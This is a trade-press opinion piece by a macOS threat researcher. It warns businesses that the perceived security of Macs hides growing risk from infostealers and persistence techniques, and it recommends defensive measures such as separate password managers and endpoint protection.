Why Macs could become an Achilles heel for businesses in 2025

In recent years, Apple’s Mac computers have steadily gained favour within corporate environments. Their sleek design, user-friendly interface and perceived superior security have made them a preferred choice for businesses seeking reliable workstations.

However, as 2025 unfolds, there are growing concerns that this very perception of security could blindside organisations, leaving them vulnerable to increasingly sophisticated cyberthreats.

The myth of ‘better security’

One of the driving factors behind the rise in popularity of Macs is their reputation for being more secure than their Windows counterparts. This belief is often fuelled by the assumption that “Macs don’t get malware” — a notion that has long been debunked. Nevertheless, the idea persists, largely because of the stark contrast between the relative security track record of macOS and the overwhelming volume of malware targeting Windows systems.

Unfortunately, this perception of superior security creates a dangerous blind spot for organisations. Threat actors are well aware of these assumptions and are increasingly exploiting them.

The year 2024 saw a notable rise in macOS-focused malware, particularly crimeware like infostealers. Malicious software such as Amos Atomic, Banshee Stealer, Cuckoo Stealer and Poseidon gained prominence, employing tactics designed to exfiltrate credentials and other sensitive data in a single intrusion.

Exploiting macOS weaknesses

A key weakness in macOS lies in its ‘universal password’ model. By default, the same password is used to log in, install software and unlock the Keychain — the built-in password manager that stores all other credentials.

This design flaw makes it alarmingly easy for attackers to compromise a system, particularly when the user is also an admin user, the default setup on macOS. By spoofing a password dialog box — a task simplified by the macOS native AppleScript technology — malware can trick users into handing over their credentials. Once obtained, attackers gain access to the Keychain and, by extension, any organisation credentials stored therein.

The implications of these weaknesses are far-reaching. Unlike legacy malware that seeks persistence on a device, modern macOS crimeware often operates on a ‘smash-and-grab’ model. It’s designed to extract as much valuable information as possible before the intrusion is detected.

Defensive strategies for organisations

Addressing these challenges requires a proactive approach to macOS security. Two essential defensive strategies organisations should prioritise are:

1. Adopt password managers: Encourage or mandate the use of third-party password managers instead of relying on Apple’s built-in Keychain and Passwords app. Separating the login password from access to the passwords database is crucial.
2. Deploy robust security software: The macOS native malware detection system — XProtect — is updated infrequently and only blocks a small proportion of known malware, leaving significant security gaps. Organisations should invest in comprehensive endpoint protection solutions to provide real-time threat detection and mitigation capabilities.

The rise of persistent threats

While crimeware thrives on rapid data exfiltration, more advanced adversaries, such as nation-state actors, often seek to maintain persistence within compromised systems.

Apple’s introduction of user notifications for background login items in macOS Ventura forced attackers to evolve their tactics. They now resort to sophisticated methods, including:

• ‘Trojanising’ popular software: Malicious actors compromise frequently used applications to gain long-term access to systems.
• Targeting development environments: Tools like Visual Studio and Xcode can be targeted to inject malicious code into software development pipelines, while package managers like PyPI, NPM and Crates have increasingly been targeted by threat actors for the same reason.
• Leveraging legacy Unix components: Attackers exploit outdated command-line environments like zshenv and zshrc to maintain undetected access.
   

These evolving tactics underscore the need for continuous vigilance. Productivity apps, integrated development environments (IDEs) and any mandated software can become avenues for exploitation. As a result, security policies should be reviewed regularly, and exceptions or ‘allow lists’ should be kept to a minimum. Furthermore, monitoring for anomalous behaviour — such as unexpected process creation or unusual network traffic — is critical to identifying and mitigating persistent threats.

Rethinking the ‘secure-by-design’ narrative

Despite their reputation, Macs are no more ‘secure by design’ than any other computing platform. The notion that macOS devices are inherently immune to cyber attacks has been disproven time and again. Though the path to compromise may be different to Windows PCs, threat actors have increasingly found their way into organisations’ networks through attacks on Macs and Mac users.

This means adopting a comprehensive security posture that treats Macs as primary targets, rather than assuming they are safe by default. Investing in regular employee training, enforcing strict security protocols, and maintaining up-to-date defences are crucial steps in mitigating risks, as for any computing system.

A growing appeal

As Macs continue to gain traction in the corporate world, their appeal to cybercriminals will only grow. The illusion of superior security, coupled with inherent weaknesses, makes them an attractive target for threat actors. Organisations must recognise that security is not a static attribute but a continuous process. By addressing macOS-specific challenges head-on, businesses can safeguard their systems and data, ensuring that Macs do not become their Achilles heel in 2025.

*Phil Stokes is a Threat Researcher at SentinelOne, specialising in macOS threat intelligence, platform vulnerabilities and malware analysis. He began his journey into macOS security as a software developer, creating end-user troubleshooting and security tools just at the time when macOS adware and commodity malware first began appearing on the platform. Phil has been closely following the development of macOS threats as well as researching Mac software and OS vulnerabilities since 2014.

Image credit: istock.com/asbe